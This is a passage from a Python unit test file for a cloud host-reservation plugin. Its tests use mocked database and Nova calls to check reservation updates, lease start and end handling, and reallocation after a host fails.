'706eb3bc-07ed-4383-be93-b32845ece672',
values)
host_reservation_get.assert_called_with(
u'91253650-cc34-4c4f-bbe8-c943aa7d0c9b')
host_allocation_destroy.assert_called_with(
'dd305477-4df8-4547-87f6-69069ee546a6')
host_allocation_create.assert_called_with(
{
'compute_host_id': 'host2',
'reservation_id': '706eb3bc-07ed-4383-be93-b32845ece672'
}
)
def test_update_reservation_min_increase_success(self):
values = {
'start_date': datetime.datetime(2017, 7, 12, 20, 00),
'end_date': datetime.datetime(2017, 7, 12, 21, 00),
'min': 3
}
reservation_get = self.patch(self.db_api, 'reservation_get')
reservation_get.return_value = {
'lease_id': '10870923-6d56-45c9-b592-f788053f5baa',
'resource_id': '91253650-cc34-4c4f-bbe8-c943aa7d0c9b',
'status': 'pending'
}
lease_get = self.patch(self.db_api, 'lease_get')
lease_get.return_value = {
'start_date': datetime.datetime(2017, 7, 12, 20, 00),
'end_date': datetime.datetime(2017, 7, 12, 21, 00)
}
host_reservation_get = self.patch(self.db_api, 'host_reservation_get')
host_reservation_get.return_value = {
'id': '91253650-cc34-4c4f-bbe8-c943aa7d0c9b',
'count_range': '2-3',
'hypervisor_properties': '["=", "$memory_mb", "16384"]',
'resource_properties': ''
}
host_allocation_get_all = self.patch(
self.db_api, 'host_allocation_get_all_by_values')
host_allocation_get_all.return_value = [
{
'id': 'dd305477-4df8-4547-87f6-69069ee546a6',
'compute_host_id': 'host1'
},
{
'id': 'dd305477-4df8-4547-87f6-69069ee546a7',
'compute_host_id': 'host2'
}
]
host_get_all_by_queries = self.patch(self.db_api,
'host_get_all_by_queries')
host_get_all_by_queries.return_value = [
{'id': 'host1'},
{'id': 'host2'},
{'id': 'host3'}
]
host_allocation_destroy = self.patch(self.db_api,
'host_allocation_destroy')
host_allocation_create = self.patch(self.db_api,
'host_allocation_create')
matching_hosts = self.patch(self.fake_phys_plugin, '_matching_hosts')
matching_hosts.return_value = ['host3']
host_reservation_update = self.patch(self.db_api,
'host_reservation_update')
self.fake_phys_plugin.update_reservation(
'706eb3bc-07ed-4383-be93-b32845ece672',
values)
host_reservation_get.assert_called_with(
'91253650-cc34-4c4f-bbe8-c943aa7d0c9b')
matching_hosts.assert_called_with(
'["=", "$memory_mb", "16384"]',
'',
'1-1',
datetime.datetime(2017, 7, 12, 20, 00),
datetime.datetime(2017, 7, 12, 21, 00)
)
host_allocation_destroy.assert_not_called()
host_allocation_create.assert_called_with(
{
'compute_host_id': 'host3',
'reservation_id': '706eb3bc-07ed-4383-be93-b32845ece672'
}
)
host_reservation_update.assert_called_with(
'91253650-cc34-4c4f-bbe8-c943aa7d0c9b',
{'count_range': '3-3'}
)
def test_update_reservation_min_increase_fail(self):
values = {
'start_date': datetime.datetime(2017, 7, 12, 20, 00),
'end_date': datetime.datetime(2017, 7, 12, 21, 00),
'min': 3
}
reservation_get = self.patch(self.db_api, 'reservation_get')
reservation_get.return_value = {
'lease_id': '10870923-6d56-45c9-b592-f788053f5baa',
'resource_id': '91253650-cc34-4c4f-bbe8-c943aa7d0c9b',
'status': 'pending'
}
lease_get = self.patch(self.db_api, 'lease_get')
lease_get.return_value = {
'start_date': datetime.datetime(2017, 7, 12, 20, 00),
'end_date': datetime.datetime(2017, 7, 12, 21, 00)
}
host_reservation_get = self.patch(self.db_api, 'host_reservation_get')
host_reservation_get.return_value = {
'id': '91253650-cc34-4c4f-bbe8-c943aa7d0c9b',
'count_range': '2-3',
'hypervisor_properties': '["=", "$memory_mb", "16384"]',
'resource_properties': ''
}
host_allocation_get_all = self.patch(
self.db_api, 'host_allocation_get_all_by_values')
host_allocation_get_all.return_value = [
{
'id': 'dd305477-4df8-4547-87f6-69069ee546a6',
'compute_host_id': 'host1'
},
{
'id': 'dd305477-4df8-4547-87f6-69069ee546a7',
'compute_host_id': 'host2'
}
]
host_get_all_by_queries = self.patch(self.db_api,
'host_get_all_by_queries')
host_get_all_by_queries.return_value = [
{'id': 'host1'},
{'id': 'host2'}
]
matching_hosts = self.patch(self.fake_phys_plugin, '_matching_hosts')
matching_hosts.return_value = []
self.assertRaises(
manager_exceptions.NotEnoughHostsAvailable,
self.fake_phys_plugin.update_reservation,
'706eb3bc-07ed-4383-be93-b32845ece672',
values)
matching_hosts.assert_called_with(
'["=", "$memory_mb", "16384"]',
'',
'1-1',
datetime.datetime(2017, 7, 12, 20, 00),
datetime.datetime(2017, 7, 12, 21, 00)
)
def test_update_reservation_min_decrease(self):
values = {
'start_date': datetime.datetime(2017, 7, 12, 20, 00),
'end_date': datetime.datetime(2017, 7, 12, 21, 00),
'min': 1
}
reservation_get = self.patch(self.db_api, 'reservation_get')
reservation_get.return_value = {
'lease_id': '10870923-6d56-45c9-b592-f788053f5baa',
'resource_id': '91253650-cc34-4c4f-bbe8-c943aa7d0c9b',
'status': 'pending'
}
lease_get = self.patch(self.db_api, 'lease_get')
lease_get.return_value = {
'start_date': datetime.datetime(2017, 7, 12, 20, 00),
'end_date': datetime.datetime(2017, 7, 12, 21, 00)
}
host_reservation_get = self.patch(self.db_api, 'host_reservation_get')
host_reservation_get.return_value = {
'id': '91253650-cc34-4c4f-bbe8-c943aa7d0c9b',
'count_range': '2-2',
'hypervisor_properties': '["=", "$memory_mb", "16384"]',
'resource_properties': ''
}
host_allocation_get_all = self.patch(
self.db_api, 'host_allocation_get_all_by_values')
host_allocation_get_all.return_value = [
{
'id': 'dd305477-4df8-4547-87f6-69069ee546a6',
'compute_host_id': 'host1'
},
{
'id': 'dd305477-4df8-4547-87f6-69069ee546a7',
'compute_host_id': 'host2'
}
]
host_get_all_by_queries = self.patch(self.db_api,
'host_get_all_by_queries')
host_get_all_by_queries.return_value = [
{'id': 'host1'},
{'id': 'host2'}
]
matching_hosts = self.patch(self.fake_phys_plugin, '_matching_hosts')
host_allocation_destroy = self.patch(self.db_api,
'host_allocation_destroy')
host_allocation_create = self.patch(self.db_api,
'host_allocation_create')
host_reservation_update = self.patch(self.db_api,
'host_reservation_update')
self.fake_phys_plugin.update_reservation(
'706eb3bc-07ed-4383-be93-b32845ece672',
values)
matching_hosts.assert_not_called()
host_allocation_destroy.assert_not_called()
host_allocation_create.assert_not_called()
host_reservation_update.assert_called_with(
'91253650-cc34-4c4f-bbe8-c943aa7d0c9b',
{'count_range': '1-2'}
)
def test_update_reservation_max_increase_alloc(self):
values = {
'start_date': datetime.datetime(2017, 7, 12, 20, 00),
'end_date': datetime.datetime(2017, 7, 12, 21, 00),
'max': 3
}
reservation_get = self.patch(self.db_api, 'reservation_get')
reservation_get.return_value = {
'lease_id': '10870923-6d56-45c9-b592-f788053f5baa',
'resource_id': '91253650-cc34-4c4f-bbe8-c943aa7d0c9b',
'status': 'pending'
}
lease_get = self.patch(self.db_api, 'lease_get')
lease_get.return_value = {
'start_date': datetime.datetime(2017, 7, 12, 20, 00),
'end_date': datetime.datetime(2017, 7, 12, 21, 00)
}
host_reservation_get = self.patch(self.db_api, 'host_reservation_get')
host_reservation_get.return_value = {
'id': '91253650-cc34-4c4f-bbe8-c943aa7d0c9b',
'count_range': '1-2',
'hypervisor_properties': '["=", "$memory_mb", "16384"]',
'resource_properties': ''
}
host_allocation_get_all = self.patch(
self.db_api, 'host_allocation_get_all_by_values')
host_allocation_get_all.return_value = [
{
'id': 'dd305477-4df8-4547-87f6-69069ee546a6',
'compute_host_id': 'host1'
},
{
'id': 'dd305477-4df8-4547-87f6-69069ee546a7',
'compute_host_id': 'host2'
}
]
host_get_all_by_queries = self.patch(self.db_api,
'host_get_all_by_queries')
host_get_all_by_queries.return_value = [
{'id': 'host1'},
{'id': 'host2'},
{'id': 'host3'}
]
host_allocation_destroy = self.patch(self.db_api,
'host_allocation_destroy')
host_allocation_create = self.patch(self.db_api,
'host_allocation_create')
matching_hosts = self.patch(self.fake_phys_plugin, '_matching_hosts')
matching_hosts.return_value = ['host3']
host_reservation_update = self.patch(self.db_api,
'host_reservation_update')
self.fake_phys_plugin.update_reservation(
'706eb3bc-07ed-4383-be93-b32845ece672',
values)
host_reservation_get.assert_called_with(
'91253650-cc34-4c4f-bbe8-c943aa7d0c9b')
matching_hosts.assert_called_with(
'["=", "$memory_mb", "16384"]',
'',
'0-1',
datetime.datetime(2017, 7, 12, 20, 00),
datetime.datetime(2017, 7, 12, 21, 00)
)
host_allocation_destroy.assert_not_called()
host_allocation_create.assert_called_with(
{
'compute_host_id': 'host3',
'reservation_id': '706eb3bc-07ed-4383-be93-b32845ece672'
}
)
host_reservation_update.assert_called_with(
'91253650-cc34-4c4f-bbe8-c943aa7d0c9b',
{'count_range': '1-3'}
)
def test_update_active_reservation_max_increase_alloc(self):
values = {
'start_date': datetime.datetime(2017, 7, 12, 20, 00),
'end_date': datetime.datetime(2017, 7, 12, 21, 00),
'max': 3
}
reservation_get = self.patch(self.db_api, 'reservation_get')
reservation_get.return_value = {
'lease_id': '10870923-6d56-45c9-b592-f788053f5baa',
'resource_id': '91253650-cc34-4c4f-bbe8-c943aa7d0c9b',
'status': 'active'
}
lease_get = self.patch(self.db_api, 'lease_get')
lease_get.return_value = {
'start_date': datetime.datetime(2017, 7, 12, 20, 00),
'end_date': datetime.datetime(2017, 7, 12, 21, 00)
}
host_reservation_get = self.patch(self.db_api, 'host_reservation_get')
host_reservation_get.return_value = {
'id': '91253650-cc34-4c4f-bbe8-c943aa7d0c9b',
'count_range': '1-2',
'hypervisor_properties': '["=", "$memory_mb", "16384"]',
'resource_properties': '',
'reservation_id': u'706eb3bc-07ed-4383-be93-b32845ece672',
'aggregate_id': 1,
}
host_allocation_get_all = self.patch(
self.db_api, 'host_allocation_get_all_by_values')
host_allocation_get_all.return_value = [
{
'id': 'dd305477-4df8-4547-87f6-69069ee546a6',
'compute_host_id': 'host1'
},
{
'id': 'dd305477-4df8-4547-87f6-69069ee546a7',
'compute_host_id': 'host2'
}
]
host_get_all_by_queries = self.patch(self.db_api,
'host_get_all_by_queries')
host_get_all_by_queries.return_value = [
{'id': 'host1'},
{'id': 'host2'},
{'id': 'host3'}
]
host_allocation_destroy = self.patch(self.db_api,
'host_allocation_destroy')
host_allocation_create = self.patch(self.db_api,
'host_allocation_create')
matching_hosts = self.patch(self.fake_phys_plugin, '_matching_hosts')
matching_hosts.return_value = ['host3']
host_get = self.patch(self.db_api, 'host_get')
host_get.return_value = {'service_name': 'host3_hostname'}
add_computehost = self.patch(
self.nova.ReservationPool, 'add_computehost')
host_reservation_update = self.patch(self.db_api,
'host_reservation_update')
self.fake_phys_plugin.update_reservation(
'706eb3bc-07ed-4383-be93-b32845ece672',
values)
host_reservation_get.assert_called_with(
'91253650-cc34-4c4f-bbe8-c943aa7d0c9b')
matching_hosts.assert_called_with(
'["=", "$memory_mb", "16384"]',
'',
'0-1',
datetime.datetime(2017, 7, 12, 20, 00),
datetime.datetime(2017, 7, 12, 21, 00)
)
host_allocation_destroy.assert_not_called()
host_allocation_create.assert_called_with(
{
'compute_host_id': 'host3',
'reservation_id': '706eb3bc-07ed-4383-be93-b32845ece672'
}
)
add_computehost.assert_called_with(1, ['host3_hostname'])
host_reservation_update.assert_called_with(
'91253650-cc34-4c4f-bbe8-c943aa7d0c9b',
{'count_range': '1-3'}
)
def test_update_reservation_max_increase_noalloc(self):
values = {
'start_date': datetime.datetime(2017, 7, 12, 20, 00),
'end_date': datetime.datetime(2017, 7, 12, 21, 00),
'max': 3
}
reservation_get = self.patch(self.db_api, 'reservation_get')
reservation_get.return_value = {
'lease_id': '10870923-6d56-45c9-b592-f788053f5baa',
'resource_id': '91253650-cc34-4c4f-bbe8-c943aa7d0c9b',
'status': 'pending'
}
lease_get = self.patch(self.db_api, 'lease_get')
lease_get.return_value = {
'start_date': datetime.datetime(2017, 7, 12, 20, 00),
'end_date': datetime.datetime(2017, 7, 12, 21, 00)
}
host_reservation_get = self.patch(self.db_api, 'host_reservation_get')
host_reservation_get.return_value = {
'id': '91253650-cc34-4c4f-bbe8-c943aa7d0c9b',
'count_range': '1-2',
'hypervisor_properties': '["=", "$memory_mb", "16384"]',
'resource_properties': ''
}
host_allocation_get_all = self.patch(
self.db_api, 'host_allocation_get_all_by_values')
host_allocation_get_all.return_value = [
{
'id': 'dd305477-4df8-4547-87f6-69069ee546a6',
'compute_host_id': 'host1'
},
{
'id': 'dd305477-4df8-4547-87f6-69069ee546a7',
'compute_host_id': 'host2'
}
]
host_get_all_by_queries = self.patch(self.db_api,
'host_get_all_by_queries')
host_get_all_by_queries.return_value = [
{'id': 'host1'},
{'id': 'host2'}
]
matching_hosts = self.patch(self.fake_phys_plugin, '_matching_hosts')
matching_hosts.return_value = []
host_reservation_update = self.patch(self.db_api,
'host_reservation_update')
self.fake_phys_plugin.update_reservation(
'706eb3bc-07ed-4383-be93-b32845ece672',
values)
host_reservation_get.assert_called_with(
'91253650-cc34-4c4f-bbe8-c943aa7d0c9b')
matching_hosts.assert_called_with(
'["=", "$memory_mb", "16384"]',
'',
'0-1',
datetime.datetime(2017, 7, 12, 20, 00),
datetime.datetime(2017, 7, 12, 21, 00)
)
host_reservation_update.assert_called_with(
'91253650-cc34-4c4f-bbe8-c943aa7d0c9b',
{'count_range': '1-3'}
)
def test_update_reservation_max_decrease(self):
values = {
'start_date': datetime.datetime(2017, 7, 12, 20, 00),
'end_date': datetime.datetime(2017, 7, 12, 21, 00),
'max': 1
}
reservation_get = self.patch(self.db_api, 'reservation_get')
reservation_get.return_value = {
'lease_id': '10870923-6d56-45c9-b592-f788053f5baa',
'resource_id': '91253650-cc34-4c4f-bbe8-c943aa7d0c9b',
'status': 'pending'
}
lease_get = self.patch(self.db_api, 'lease_get')
lease_get.return_value = {
'start_date': datetime.datetime(2017, 7, 12, 20, 00),
'end_date': datetime.datetime(2017, 7, 12, 21, 00)
}
host_reservation_get = self.patch(self.db_api, 'host_reservation_get')
host_reservation_get.return_value = {
'id': '91253650-cc34-4c4f-bbe8-c943aa7d0c9b',
'count_range': '1-2',
'hypervisor_properties': '["=", "$memory_mb", "16384"]',
'resource_properties': ''
}
host_allocation_get_all = self.patch(
self.db_api, 'host_allocation_get_all_by_values')
host_allocation_get_all.return_value = [
{
'id': 'dd305477-4df8-4547-87f6-69069ee546a6',
'compute_host_id': 'host1'
},
{
'id': 'dd305477-4df8-4547-87f6-69069ee546a7',
'compute_host_id': 'host2'
}
]
host_get_all_by_queries = self.patch(self.db_api,
'host_get_all_by_queries')
host_get_all_by_queries.return_value = [
{'id': 'host1'},
{'id': 'host2'}
]
host_allocation_destroy = self.patch(self.db_api,
'host_allocation_destroy')
host_reservation_update = self.patch(self.db_api,
'host_reservation_update')
self.fake_phys_plugin.update_reservation(
'706eb3bc-07ed-4383-be93-b32845ece672',
values)
host_reservation_get.assert_called_with(
'91253650-cc34-4c4f-bbe8-c943aa7d0c9b')
host_allocation_destroy.assert_called_with(
'dd305477-4df8-4547-87f6-69069ee546a6')
host_reservation_update.assert_called_with(
'91253650-cc34-4c4f-bbe8-c943aa7d0c9b',
{'count_range': '1-1'}
)
def test_update_reservation_realloc_with_properties_change(self):
values = {
'start_date': datetime.datetime(2017, 7, 12, 20, 00),
'end_date': datetime.datetime(2017, 7, 12, 21, 00),
'hypervisor_properties': '["=", "$memory_mb", "32768"]',
}
reservation_get = self.patch(self.db_api, 'reservation_get')
reservation_get.return_value = {
'lease_id': '10870923-6d56-45c9-b592-f788053f5baa',
'resource_id': '91253650-cc34-4c4f-bbe8-c943aa7d0c9b',
'status': 'pending'
}
lease_get = self.patch(self.db_api, 'lease_get')
lease_get.return_value = {
'start_date': datetime.datetime(2017, 7, 12, 20, 00),
'end_date': datetime.datetime(2017, 7, 12, 21, 00)
}
host_reservation_get = self.patch(self.db_api, 'host_reservation_get')
host_reservation_get.return_value = {
'id': '91253650-cc34-4c4f-bbe8-c943aa7d0c9b',
'count_range': '1-1',
'hypervisor_properties': '["=", "$memory_mb", "16384"]',
'resource_properties': ''
}
host_allocation_get_all = self.patch(
self.db_api, 'host_allocation_get_all_by_values')
host_allocation_get_all.return_value = [
{
'id': 'dd305477-4df8-4547-87f6-69069ee546a6',
'compute_host_id': 'host1'
}
]
host_get_all_by_queries = self.patch(self.db_api,
'host_get_all_by_queries')
host_get_all_by_queries.return_value = [{'id': 'host2'}]
matching_hosts = self.patch(self.fake_phys_plugin, '_matching_hosts')
matching_hosts.return_value = ['host2']
host_allocation_create = self.patch(self.db_api,
'host_allocation_create')
host_allocation_destroy = self.patch(self.db_api,
'host_allocation_destroy')
host_reservation_update = self.patch(self.db_api,
'host_reservation_update')
self.fake_phys_plugin.update_reservation(
'706eb3bc-07ed-4383-be93-b32845ece672',
values)
host_reservation_get.assert_called_with(
'91253650-cc34-4c4f-bbe8-c943aa7d0c9b')
matching_hosts.assert_called_with(
'["=", "$memory_mb", "32768"]',
'',
'1-1',
datetime.datetime(2017, 7, 12, 20, 00),
datetime.datetime(2017, 7, 12, 21, 00)
)
host_allocation_create.assert_called_with(
{
'compute_host_id': 'host2',
'reservation_id': '706eb3bc-07ed-4383-be93-b32845ece672'
}
)
host_allocation_destroy.assert_called_with(
'dd305477-4df8-4547-87f6-69069ee546a6'
)
host_reservation_update.assert_called_with(
'91253650-cc34-4c4f-bbe8-c943aa7d0c9b',
{'hypervisor_properties': '["=", "$memory_mb", "32768"]'}
)
def test_update_reservation_no_requested_hosts_available(self):
values = {
'start_date': datetime.datetime(2017, 7, 12, 20, 00),
'end_date': datetime.datetime(2017, 7, 12, 21, 00),
'resource_properties': '[">=", "$vcpus", "32768"]'
}
reservation_get = self.patch(self.db_api, 'reservation_get')
reservation_get.return_value = {
'lease_id': '10870923-6d56-45c9-b592-f788053f5baa',
'resource_id': '91253650-cc34-4c4f-bbe8-c943aa7d0c9b',
'status': 'pending'
}
lease_get = self.patch(self.db_api, 'lease_get')
lease_get.return_value = {
'start_date': datetime.datetime(2013, 12, 19, 20, 00),
'end_date': datetime.datetime(2013, 12, 19, 21, 00)
}
host_reservation_get = self.patch(self.db_api, 'host_reservation_get')
host_reservation_get.return_value = {
'id': '91253650-cc34-4c4f-bbe8-c943aa7d0c9b',
'count_range': '1-1',
'hypervisor_properties': '["=", "$memory_mb", "16384"]',
'resource_properties': ''
}
host_allocation_get_all = self.patch(
self.db_api, 'host_allocation_get_all_by_values')
host_allocation_get_all.return_value = [
{
'id': 'dd305477-4df8-4547-87f6-69069ee546a6',
'compute_host_id': 'host1'
}
]
host_get_all_by_queries = self.patch(self.db_api,
'host_get_all_by_queries')
host_get_all_by_queries.return_value = []
matching_hosts = self.patch(self.fake_phys_plugin, '_matching_hosts')
matching_hosts.return_value = []
self.assertRaises(
manager_exceptions.NotEnoughHostsAvailable,
self.fake_phys_plugin.update_reservation,
'441c1476-9f8f-4700-9f30-cd9b6fef3509',
values)
def test_on_start(self):
host_reservation_get = self.patch(self.db_api, 'host_reservation_get')
host_reservation_get.return_value = {
'reservation_id': u'593e7028-c0d1-4d76-8642-2ffd890b324c',
'aggregate_id': 1,
}
host_allocation_get_all_by_values = self.patch(
self.db_api, 'host_allocation_get_all_by_values')
host_allocation_get_all_by_values.return_value = [
{'compute_host_id': 'host1'},
]
host_get = self.patch(self.db_api, 'host_get')
host_get.return_value = {'service_name': 'host1_hostname'}
add_computehost = self.patch(
self.nova.ReservationPool, 'add_computehost')
self.fake_phys_plugin.on_start(u'04de74e8-193a-49d2-9ab8-cba7b49e45e8')
add_computehost.assert_called_with(1, ['host1_hostname'])
def test_before_end_with_no_action(self):
host_reservation_get = self.patch(self.db_api, 'host_reservation_get')
host_reservation_get.return_value = {'before_end': ''}
reservationpool = self.patch(self.nova, 'ReservationPool')
self.fake_phys_plugin.before_end(
u'04de74e8-193a-49d2-9ab8-cba7b49e45e8')
reservationpool.assert_not_called()
def test_before_end_with_snapshot(self):
host_reservation_get = self.patch(self.db_api, 'host_reservation_get')
host_reservation_get.return_value = {
'aggregate_id': 1,
'before_end': 'snapshot'
}
get_computehosts = self.patch(self.nova.ReservationPool,
'get_computehosts')
get_computehosts.return_value = ['host']
list_servers = self.patch(self.ServerManager, 'list')
list_servers.return_value = ['server1', 'server2']
create_image = self.patch(self.ServerManager, 'create_image')
self.fake_phys_plugin.before_end(
u'04de74e8-193a-49d2-9ab8-cba7b49e45e8')
create_image.assert_any_call(server='server1')
create_image.assert_any_call(server='server2')
def test_on_end_with_instances(self):
host_reservation_get = self.patch(self.db_api, 'host_reservation_get')
host_reservation_get.return_value = {
'id': u'04de74e8-193a-49d2-9ab8-cba7b49e45e8',
'reservation_id': u'593e7028-c0d1-4d76-8642-2ffd890b324c',
'aggregate_id': 1
}
host_reservation_update = self.patch(
self.db_api,
'host_reservation_update')
host_allocation_get_all_by_values = self.patch(
self.db_api,
'host_allocation_get_all_by_values')
host_allocation_get_all_by_values.return_value = [
{'id': u'bfa9aa0b-8042-43eb-a4e6-4555838bf64f',
'compute_host_id': u'cdae2a65-236f-475a-977d-f6ad82f828b7',
},
]
host_allocation_destroy = self.patch(
self.db_api,
'host_allocation_destroy')
get_computehosts = self.patch(self.nova.ReservationPool,
'get_computehosts')
get_computehosts.return_value = ['host']
list_servers = self.patch(self.ServerManager, 'list')
list_servers.return_value = ['server1', 'server2']
delete_server = self.patch(self.ServerManager, 'delete')
# Mock delete_server so the first call fails to find the instance.
# This can happen when the user is deleting instances concurrently.
delete_server.side_effect = mock.Mock(
side_effect=[nova_exceptions.NotFound(
404, 'Instance server1 could not be found.'), None])
delete_pool = self.patch(self.nova.ReservationPool, 'delete')
self.fake_phys_plugin.on_end(u'04de74e8-193a-49d2-9ab8-cba7b49e45e8')
host_reservation_update.assert_called_with(
u'04de74e8-193a-49d2-9ab8-cba7b49e45e8', {'status': 'completed'})
host_allocation_destroy.assert_called_with(
u'bfa9aa0b-8042-43eb-a4e6-4555838bf64f')
list_servers.assert_called_with(search_opts={'host': 'host',
'all_tenants': 1})
delete_server.assert_any_call(server='server1')
delete_server.assert_any_call(server='server2')
delete_pool.assert_called_with(1)
def test_on_end_without_instances(self):
host_reservation_get = self.patch(self.db_api, 'host_reservation_get')
host_reservation_get.return_value = {
'id': u'04de74e8-193a-49d2-9ab8-cba7b49e45e8',
'reservation_id': u'593e7028-c0d1-4d76-8642-2ffd890b324c',
'aggregate_id': 1
}
host_reservation_update = self.patch(
self.db_api,
'host_reservation_update')
host_allocation_get_all_by_values = self.patch(
self.db_api,
'host_allocation_get_all_by_values')
host_allocation_get_all_by_values.return_value = [
{'id': u'bfa9aa0b-8042-43eb-a4e6-4555838bf64f',
'compute_host_id': u'cdae2a65-236f-475a-977d-f6ad82f828b7',
},
]
host_allocation_destroy = self.patch(
self.db_api,
'host_allocation_destroy')
get_computehosts = self.patch(self.nova.ReservationPool,
'get_computehosts')
get_computehosts.return_value = ['host']
list_servers = self.patch(self.ServerManager, 'list')
list_servers.return_value = []
delete_server = self.patch(self.ServerManager, 'delete')
delete_pool = self.patch(self.nova.ReservationPool, 'delete')
self.fake_phys_plugin.on_end(u'04de74e8-193a-49d2-9ab8-cba7b49e45e8')
host_reservation_update.assert_called_with(
u'04de74e8-193a-49d2-9ab8-cba7b49e45e8', {'status': 'completed'})
host_allocation_destroy.assert_called_with(
u'bfa9aa0b-8042-43eb-a4e6-4555838bf64f')
delete_server.assert_not_called()
delete_pool.assert_called_with(1)
def test_heal_reservations_before_start_and_resources_changed(self):
failed_host = {'id': '1'}
dummy_reservation = {
'id': 'rsrv-1',
'resource_type': plugin.RESOURCE_TYPE,
'lease_id': 'lease-1',
'status': 'pending',
'hypervisor_properties': [],
'resource_properties': [],
'resource_id': 'resource-1',
'computehost_allocations': [{
'id': 'alloc-1', 'compute_host_id': failed_host['id'],
'reservation_id': 'rsrv-1'
}]
}
get_reservations = self.patch(self.db_utils,
'get_reservations_by_host_ids')
get_reservations.return_value = [dummy_reservation]
reallocate = self.patch(self.fake_phys_plugin, '_reallocate')
reallocate.return_value = True
result = self.fake_phys_plugin.heal_reservations(
[failed_host],
datetime.datetime(2020, 1, 1, 12, 00),
datetime.datetime(2020, 1, 1, 13, 00))
reallocate.assert_called_once_with(
dummy_reservation['computehost_allocations'][0])
self.assertEqual({}, result)
def test_heal_reservations_before_start_and_missing_resources(self):
failed_host = {'id': '1'}
dummy_reservation = {
'id': 'rsrv-1',
'resource_type': plugin.RESOURCE_TYPE,
'lease_id': 'lease-1',
'status': 'pending',
'hypervisor_properties': [],
'resource_properties': [],
'resource_id': 'resource-1',
'computehost_allocations': [{
'id': 'alloc-1', 'compute_host_id': failed_host['id'],
'reservation_id': 'rsrv-1'
}]
}
get_reservations = self.patch(self.db_utils,
'get_reservations_by_host_ids')
get_reservations.return_value = [dummy_reservation]
reallocate = self.patch(self.fake_phys_plugin, '_reallocate')
reallocate.return_value = False
result = self.fake_phys_plugin.heal_reservations(
[failed_host],
datetime.datetime(2020, 1, 1, 12, 00),
datetime.datetime(2020, 1, 1, 13, 00))
reallocate.assert_called_once_with(
dummy_reservation['computehost_allocations'][0])
self.assertEqual(
{dummy_reservation['id']: {'missing_resources': True}},
result)
def test_heal_active_reservations_and_resources_changed(self):
failed_host = {'id': '1'}
dummy_reservation = {
'id': 'rsrv-1',
'resource_type': plugin.RESOURCE_TYPE,
'lease_id': 'lease-1',
'status': 'active',
'hypervisor_properties': [],
'resource_properties': [],
'resource_id': 'resource-1',
'computehost_allocations': [{
'id': 'alloc-1', 'compute_host_id': failed_host['id'],
'reservation_id': 'rsrv-1'
}]
}
get_reservations = self.patch(self.db_utils,
'get_reservations_by_host_ids')
get_reservations.return_value = [dummy_reservation]
reallocate = self.patch(self.fake_phys_plugin, '_reallocate')
reallocate.return_value = True
result = self.fake_phys_plugin.heal_reservations(
[failed_host],
datetime.datetime(2020, 1, 1, 12, 00),
datetime.datetime(2020, 1, 1, 13, 00))
reallocate.assert_called_once_with(
dummy_reservation['computehost_allocations'][0])
self.assertEqual(
{dummy_reservation['id']: {'resources_changed': True}},
result)
def test_heal_active_reservations_and_missing_resources(self):
failed_host = {'id': '1'}
dummy_reservation = {
'id': 'rsrv-1',
'resource_type': plugin.RESOURCE_TYPE,
'lease_id': 'lease-1',
'status': 'active',
'hypervisor_properties': [],
'resource_properties': [],
'resource_id': 'resource-1',
'computehost_allocations': [{
'id': 'alloc-1', 'compute_host_id': failed_host['id'],
'reservation_id': 'rsrv-1'
}]
}
get_reservations = self.patch(self.db_utils,
'get_reservations_by_host_ids')
get_reservations.return_value = [dummy_reservation]
reallocate = self.patch(self.fake_phys_plugin, '_reallocate')
reallocate.return_value = False
result = self.fake_phys_plugin.heal_reservations(
[failed_host],
datetime.datetime(2020, 1, 1, 12, 00),
datetime.datetime(2020, 1, 1, 13, 00))
reallocate.assert_called_once_with(
dummy_reservation['computehost_allocations'][0])
self.assertEqual(
{dummy_reservation['id']: {'missing_resources': True}},
result)
def test_reallocate_before_start(self):
failed_host = {'id': '1'}
new_host = {'id': '2'}
dummy_allocation = {
'id': 'alloc-1',
'compute_host_id': failed_host['id'],
'reservation_id': 'rsrv-1'
}
dummy_reservation = {
'id': 'rsrv-1',
'resource_type': plugin.RESOURCE_TYPE,
'lease_id': 'lease-1',
'status': 'pending',
'hypervisor_properties': [],
'resource_properties': [],
'resource_id': 'resource-1'
}
dummy_host_reservation = {
'aggregate_id': 1
}
dummy_lease = {
'name': 'lease-name',
'start_date': datetime.datetime(2020, 1, 1, 12, 00),
'end_date': datetime.datetime(2020, 1, 2, 12, 00),
'trust_id': 'trust-1'
}
reservation_get = self.patch(self.db_api, 'reservation_get')
reservation_get.return_value = dummy_reservation
host_reservation_get = self.patch(self.db_api, 'host_reservation_get')
host_reservation_get.return_value = dummy_host_reservation
lease_get = self.patch(self.db_api, 'lease_get')
lease_get.return_value = dummy_lease
matching_hosts = self.patch(host_plugin.PhysicalHostPlugin,
'_matching_hosts')
matching_hosts.return_value = [new_host['id']]
alloc_update = self.patch(self.db_api, 'host_allocation_update')
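        # Freeze utcnow before the lease start date so _reallocate takes the
        # "reservation not started yet" path and simply moves the allocation.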
with mock.patch.object(datetime, 'datetime',
mock.Mock(wraps=datetime.datetime)) as patched:
patched.utcnow.return_value = datetime.datetime(
2020, 1, 1, 11, 00)
result = self.fake_phys_plugin._reallocate(dummy_allocation)
matching_hosts.assert_called_once_with(
dummy_reservation['hypervisor_properties'],
dummy_reservation['resource_properties'],
'1-1', dummy_lease['start_date'], dummy_lease['end_date'])
alloc_update.assert_called_once_with(
dummy_allocation['id'],
{'compute_host_id': new_host['id']})
self.assertEqual(True, result)
def test_reallocate_active(self):
failed_host = {'id': '1',
'service_name': 'compute-1'}
new_host = {'id': '2',
'service_name': 'compute-2'}
dummy_allocation = {
'id': 'alloc-1',
'compute_host_id': failed_host['id'],
'reservation_id': 'rsrv-1'
}
dummy_reservation = {
'id': 'rsrv-1',
'resource_type': plugin.RESOURCE_TYPE,
'lease_id': 'lease-1',
'status': 'active',
'hypervisor_properties': [],
'resource_properties': [],
'resource_id': 'resource-1'
}
dummy_host_reservation = {
'aggregate_id': 1
}
dummy_lease = {
'name': 'lease-name',
'start_date': datetime.datetime(2020, 1, 1, 12, 00),
'end_date': datetime.datetime(2020, 1, 2, 12, 00),
'trust_id': 'trust-1'
}
reservation_get = self.patch(self.db_api, 'reservation_get')
reservation_get.return_value = dummy_reservation
lease_get = self.patch(self.db_api, 'lease_get')
lease_get.return_value = dummy_lease
host_reservation_get = self.patch(self.db_api, 'host_reservation_get')
host_reservation_get.return_value = dummy_host_reservation
host_get = self.patch(self.db_api, 'host_get')
host_get.side_effect = [failed_host, new_host]
matching_hosts = self.patch(host_plugin.PhysicalHostPlugin,
'_matching_hosts')
matching_hosts.return_value = [new_host['id']]
alloc_update = self.patch(self.db_api, 'host_allocation_update')
